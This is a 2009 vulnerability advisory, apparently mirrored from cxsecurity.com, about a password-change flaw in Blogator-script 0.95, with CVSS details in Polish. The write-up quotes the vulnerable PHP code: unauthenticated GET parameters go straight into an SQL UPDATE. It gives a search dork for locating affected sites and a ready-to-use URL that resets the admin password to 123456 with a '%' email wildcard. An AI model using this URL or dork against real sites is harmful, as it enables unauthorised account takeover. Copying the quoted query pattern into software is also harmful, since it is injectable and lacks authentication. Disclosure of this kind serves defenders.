Blogator-script 0.95 Change User Password Vulnerbility

2009-03-17 / 2009-03-18
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-255


Ogólna skala CVSS: 6.4/10
Znaczenie: 4.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

######################################################################## ###### # # # ...:::::Blogator-script 0.95 Change User Password Vulnerbility ::::.... # ######################################################################## ###### Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) ----------------------------------- dork: inurl:/_blogadata/ ----------------------------------- vuln code in /_blogadata/include/init_pass2.php: line 23: $id=$_GET['a']; line 24:$email=$_GET['b']; line 25: $mdp=$_GET['c']; ..... line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1"); so if we put user id for $id and put %(any) for user email($email) and $mdp=newpassword.....he he he :) ------------ vuln: http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[use r id]&b=% example:(change admin pass to 123456) http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=% --------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top